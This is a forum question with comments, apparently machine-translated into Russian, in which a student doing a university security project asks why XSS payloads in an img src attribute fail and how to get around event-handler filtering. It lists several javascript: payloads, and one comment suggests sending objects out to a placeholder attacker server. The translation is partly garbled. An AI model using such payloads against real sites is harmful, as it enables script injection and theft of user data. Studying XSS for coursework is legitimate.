Я должен сделать XSS-атаку для проекта университета, связанного с безопасностью. Я хочу сохранить изображение с вредоносным кодом внутри его исходного атрибута. Однако, похоже, у меня нет доступа к каким-либо объектам javascript из атрибута src.Объем Javascript внутри атрибута src изображения
Вот некоторые вещи, которые я пытался:
<img src="jAvascript:alert('XSS')">
Броски: предупреждение Ссылка ошибки не определен.
<img src="jAvascript:window.alert('XSS')">
Броски: Справочное окно ошибки не определен
<img src="jAvascript:var x = new XMLHttpRequest();">
Броски: Ссылка XMLHttpRequest ошибки не определен
Что здесь проблема и как я могу получить доступ к главному окну сайт и объекты, к которым я хочу получить доступ?
РЕДАКТИРОВАТЬ: Овертер и все другие события фильтруются.
Этот комментарий не очень полезен. почему он не выполнен? И ошибка подразумевает, что она выполнена. – amaik
Можете ли вы сделать что-то вроде 'javascript: 'http // yourserver.example? Js =' + Object' (и посмотреть, что приходит на ваш сервер)? – Bergi
Не все браузеры уязвимы для этой атаки. Какой браузер вы нацеливаете/проверяете -http: //stackoverflow.com/questions/1798633/xss-attack-with-javascript-in-img-src-attribute –